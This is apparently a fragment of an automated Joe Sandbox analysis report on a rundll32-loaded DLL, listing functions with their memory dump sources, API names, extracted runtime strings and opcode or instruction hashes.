                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcpy_s
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1502251526-0
                                                                                                                                                                                                                                                  • Opcode ID: aae69b84937ae52c50460b3a93fd80386282a716ad85a420871dc6e10509decd
                                                                                                                                                                                                                                                  • Instruction ID: c11a1434eabf13ff3ffc717c65629f10aad66df5d482a187dde0986ab906fb0d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aae69b84937ae52c50460b3a93fd80386282a716ad85a420871dc6e10509decd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55A1BDB2200A848BE7FA8F55E590BD977A0F3697CCF41D116EB4A57B84CB34CA48CB05
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastNameTranslate$CodePageValidValue
                                                                                                                                                                                                                                                  • String ID: utf8
                                                                                                                                                                                                                                                  • API String ID: 1791977518-905460609
                                                                                                                                                                                                                                                  • Opcode ID: a78d7057517b415f687703166ca4a3cfcdca313bed36a1596b117302a90adb15
                                                                                                                                                                                                                                                  • Instruction ID: 68df83c6e16fb6719a30522dc5a7a3ce8abf960c58eb50addb9b285837f9a530
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a78d7057517b415f687703166ca4a3cfcdca313bed36a1596b117302a90adb15
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF91AB32200B4986EBA69F21D5513E923A5FB8DBC4F54C121FE5867786EF3AC759C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2591520935-0
                                                                                                                                                                                                                                                  • Opcode ID: 802e43ab5220ed512d0623585b5c6eee699b76c966b13ec90f4942404d9e4e82
                                                                                                                                                                                                                                                  • Instruction ID: 64d13e85883def1e901923d6c9018b7936bb528f0590fea9e49b5af43c603379
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 802e43ab5220ed512d0623585b5c6eee699b76c966b13ec90f4942404d9e4e82
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20717C72710B0889FBA29B61D8527EC23B4BB4C7C8F44C526BA19677D5EF3A864DC350
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                                                                                  • Opcode ID: 1a631cd767aa6af9efa7e5aa469953c2907d5c4779ab4064bd7ad95633586567
                                                                                                                                                                                                                                                  • Instruction ID: 483f6a83d11dcc029adc45c6f3cb0b9be83de0b0cb0aa062e5b1d14df8a2b4d4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a631cd767aa6af9efa7e5aa469953c2907d5c4779ab4064bd7ad95633586567
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D319236204F8486EBA1CF25E8443EE73A4F788798F504126FA8D53B99DF39C659CB00

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                                                                                                                                                                                  • API String ID: 2943138195-1482988683
                                                                                                                                                                                                                                                  • Opcode ID: f5b08725d49e3936faf24a31500805328ba618e891ce830165a6676dc23d0718
                                                                                                                                                                                                                                                  • Instruction ID: aba4e943f25002773c1e8b8ff256808fc8ff7469cd32bafab8b6d36a2db658ad
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5b08725d49e3936faf24a31500805328ba618e891ce830165a6676dc23d0718
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E024E72A10F18D8FBA6CB68D8953ED27B1B31D7C4F608119EA091AAA8DF74C74DC740

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                                                                                                                  • String ID: `anonymous namespace'
                                                                                                                                                                                                                                                  • API String ID: 3863519203-3062148218
                                                                                                                                                                                                                                                  • Opcode ID: 99c0d059bb14feceadd0ebac364fdec140f15412be5d4b7962f4a11c550691ce
                                                                                                                                                                                                                                                  • Instruction ID: 780ad3a83c53e58fc5f4bcda82df12fb3de2ceedc09e18eee4d15cf768c518c0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99c0d059bb14feceadd0ebac364fdec140f15412be5d4b7962f4a11c550691ce
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2E14872604B8899EBA28F64E8803DD77B1F349788F908115FA8D17B96DF38C659C740

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: NameName::$Name::operator+swprintf
                                                                                                                                                                                                                                                  • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                                                                                                                                                                                  • API String ID: 130963256-2441609178
                                                                                                                                                                                                                                                  • Opcode ID: 1b7cca95e2e488a3e0c80d76d27b89714392a22bae90429b9d429f6739e61c38
                                                                                                                                                                                                                                                  • Instruction ID: 2de753167b07bd77337a4f86cbd4a1a1ff146968b76736af4f3f81d3ad70022d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b7cca95e2e488a3e0c80d76d27b89714392a22bae90429b9d429f6739e61c38
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FF1AF72604E1889FBD79BA4C9953FC27A1AF0D7C4F54C116FA0A27A96DF38874DA301

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2943138195-0
                                                                                                                                                                                                                                                  • Opcode ID: d75365040a848f4e962de2583f4bdf6dcab0124c40e345c2fd97b6724785b456
                                                                                                                                                                                                                                                  • Instruction ID: 59aeec8a3cdcdbcd6b95e25ddd39330fc951fab43e09b50c7be90718a66a7329
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d75365040a848f4e962de2583f4bdf6dcab0124c40e345c2fd97b6724785b456
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCF13D76B04A889EEB52DFA4E4903EC77B1E30978CF448016FA496BA96DF34C65DC340

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2943138195-0
                                                                                                                                                                                                                                                  • Opcode ID: a7deb5bfb90b94af832b3ced5090f2e4193ca0aafd624f38f0026d8047bab8f3
                                                                                                                                                                                                                                                  • Instruction ID: 318727eee5e13463933b1bdaa130879d0bade3f0a89f414074ac98ea7bab58df
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7deb5bfb90b94af832b3ced5090f2e4193ca0aafd624f38f0026d8047bab8f3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD711C72710A49AAFB52DFA4D4913DC37B1A7487CCF808515EE4967A99EF30C71AC390

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Replicator::operator[]
                                                                                                                                                                                                                                                  • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                                                                                                                                                  • API String ID: 3676697650-3207858774
                                                                                                                                                                                                                                                  • Opcode ID: 5a260dd3a37411976ea98f4b6fb2ab20663cecc062b10b3ff23bd445ef19509f
                                                                                                                                                                                                                                                  • Instruction ID: 42aa4a1d08367d9119b1856bc683fc241d67aaeadb9c155bb09d8b169f315b88
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a260dd3a37411976ea98f4b6fb2ab20663cecc062b10b3ff23bd445ef19509f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2817A32616A8C89FBA2CFA5E4903E837A1A75DBC8F94C116FA4907795DF39C749C340
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                                                                                                                                                                  • API String ID: 2943138195-1464470183
                                                                                                                                                                                                                                                  • Opcode ID: 088971c54ca3ffb1adebbb16f067770a9e4fe21448ff300c31355ef277b9d300
                                                                                                                                                                                                                                                  • Instruction ID: 86b2220616b80be68583d285cd14afb8824f7222dcd2462d23f21e207e41fe12
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 088971c54ca3ffb1adebbb16f067770a9e4fe21448ff300c31355ef277b9d300
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90514F32610F58C9FB92CB64E8907EC37B2B7183C9FA08015EA895BA98DF35C659C740
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: -$0$f$p$p
                                                                                                                                                                                                                                                  • API String ID: 3215553584-1865143739
                                                                                                                                                                                                                                                  • Opcode ID: 1a16dd49484b322b6fd78fdbbed546c3ccc268b2020a70802ac313a8fc196001
                                                                                                                                                                                                                                                  • Instruction ID: 634aa9d0042bbda353e8cc45d4c8daf7f92220045ba3d69c75e7207222ffe171
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a16dd49484b322b6fd78fdbbed546c3ccc268b2020a70802ac313a8fc196001
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C412B032A0418D86FBA76E15F0443EB77A1F788B94F96C116F68647AC4DF78C688CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: -$0$f$p$p
                                                                                                                                                                                                                                                  • API String ID: 3215553584-1865143739
                                                                                                                                                                                                                                                  • Opcode ID: ff8427b3a9059b88c8ce9f386e4ea062f82f7a66593184870899fb3a07859c96
                                                                                                                                                                                                                                                  • Instruction ID: 93a9ff39d45d2419c6a7fc755833649a49288bc20d1d0bfe1c27cd3576f2de20
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff8427b3a9059b88c8ce9f386e4ea062f82f7a66593184870899fb3a07859c96
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E612E331A042DA86FBA39B14D0543EB7791F35ABD4F9AC312F696476C4DF38C6888B10
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                                                                                                                  • API String ID: 2943138195-2239912363
                                                                                                                                                                                                                                                  • Opcode ID: cfb6c385fe5b2ebc5ee7c871daae868a3679fdeefb2062b3cbc30b8eca46961b
                                                                                                                                                                                                                                                  • Instruction ID: 11c260e0c16152af3f3440f9639a3bccbf9e6650033c1e5fc3f0bfcfe7c7928e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfb6c385fe5b2ebc5ee7c871daae868a3679fdeefb2062b3cbc30b8eca46961b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30513872B14F5898FB928B60D8803ED77B0B70C788F548125EE5923B96DF788389C710
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: -$f$p$p
                                                                                                                                                                                                                                                  • API String ID: 3215553584-2516539321
                                                                                                                                                                                                                                                  • Opcode ID: 19540540e18a12fbd70b594dd22ebd52cf533dd5dd11ba696ac90525da22a166
                                                                                                                                                                                                                                                  • Instruction ID: 3b4b050498cdcb5f336cd356739b46ea81abb083d02af334d156d32d0928b2a6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19540540e18a12fbd70b594dd22ebd52cf533dd5dd11ba696ac90525da22a166
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B12A27160438A86FBA39B14E0447EA7762F3587D4FF4C115F6D246AC6DF39CA888B05
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                  • Opcode ID: 8152444fde3df33d3fc19ab23fa89504be66b01d467fa357cf36183d89cc0f39
                                                                                                                                                                                                                                                  • Instruction ID: d2b285feaf2a7c9902849b73c345f52bfdc77f3075a64cd68fdca09590970db2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8152444fde3df33d3fc19ab23fa89504be66b01d467fa357cf36183d89cc0f39
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23D18D32604B488AEBA2DB25D4807DD3BA0F7497C8F008216FF8957B96CF34D689C701
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00000001800485F8,?,?,00000000,00000001800473F0,?,?,?,000000018003FF1D), ref: 00000001800482EB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00000001800485F8,?,?,00000000,00000001800473F0,?,?,?,000000018003FF1D), ref: 00000001800482F7
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3794425031.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
• Associated: 00000006.00000002.3794369878.0000000273F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3794425031.0000000273F85000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: QueryVirtual
                                                                                                                                                                                                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                                                                                                                                                  • API String ID: 1804819252-1534286854
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
